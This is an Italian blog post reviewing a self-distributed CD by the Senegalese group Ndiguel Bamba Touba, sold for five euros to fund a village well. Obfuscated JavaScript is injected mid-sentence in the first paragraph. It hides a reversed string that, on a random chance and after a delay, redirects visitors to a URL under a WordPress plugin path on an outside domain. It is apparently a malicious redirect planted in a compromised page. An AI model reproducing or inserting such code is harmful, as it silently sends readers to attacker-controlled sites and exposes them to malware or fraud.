Musica dal Senegal

image_pdfimage_print

Ndiguel Bamba Touba, Touba Rekk records, 5 euro
Dalle assolate spiagge del Senegal arriva questo CD del gruppo esordiente dei Ndiguel Bamba Touba. La b (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and è composta da un suonatore di cora, un contrabbassista, molti percussionisti e cantori. Le tracce del CD sono un alternarsi della musica dei griot (i tradizionali depositari della cultura orale dell’Africa Occidentale, esperti suonatori della cora, l’antica arpa del Sahel) con le selvagge percussioni che ricordano il grande maestro Dodou Ndiaye Rose.
Ndiguel Bamba Touba è interamente dedicato al sufismo senegalese ed ai marabutti della confraternita muriddiya. È quindi un viaggio nella solare spiritualità africana, registrato su una spiaggia a sud di Dakar. Nonostante la ruvidità del suono la qualità è impeccabile, grazie a Stefano, un ex produttore della Time records stabilitosi in Senegal.
Il CD, munito di regolare bollino SIAE, viene venduto a prezzo ipermodico (5 euro): il ricavato servirà per la costruzione di un pozzo in un villaggio senegalese. Il disco è autodistribuito, lo potete trovare da un venditore ambulante davanti alla libreria Feltrinelli oppure telefonando tutti i mercoledì dalle 21,15 in poi a Novaradio (055-3215143) chiedendo di Papa Leo. Prossimamente sarà messo in vendita anche presso i negozi del Commercio Equo e Solidale.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *